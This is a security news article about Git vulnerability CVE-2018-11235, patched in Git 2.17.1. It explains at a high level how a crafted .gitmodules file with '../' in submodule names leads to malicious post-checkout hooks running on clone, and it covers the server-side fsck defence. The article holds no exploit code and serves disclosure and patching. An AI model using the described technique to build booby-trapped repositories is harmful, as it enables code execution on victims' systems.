“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone –recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

The Git 2.17.1 addressed the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

The CVE-2018-11235 could be exploited by an attacker to set up a malformed Git repository containing a specially-built Git submodule. The attacker needs to trick victims into clone the rogue repository to execute arbitrary code on users’ systems.

The problem resides in the way the Git client handles the specially-built Git submodule.

The release also includes the support for Git server-side component that could be used by Git hosting services to detect code repositories containing malicious submodules and prevent their upload.

“In addition to the above fixes, this release adds support on the server side that reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release note for the v2.17.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targetting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”

Major Git hosting services like GitHub and Microsoft have already installed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encourages all users to update their Git clients as soon as possible.

Thomson published a technical analysis for the CVE-2018-11235 vulnerability.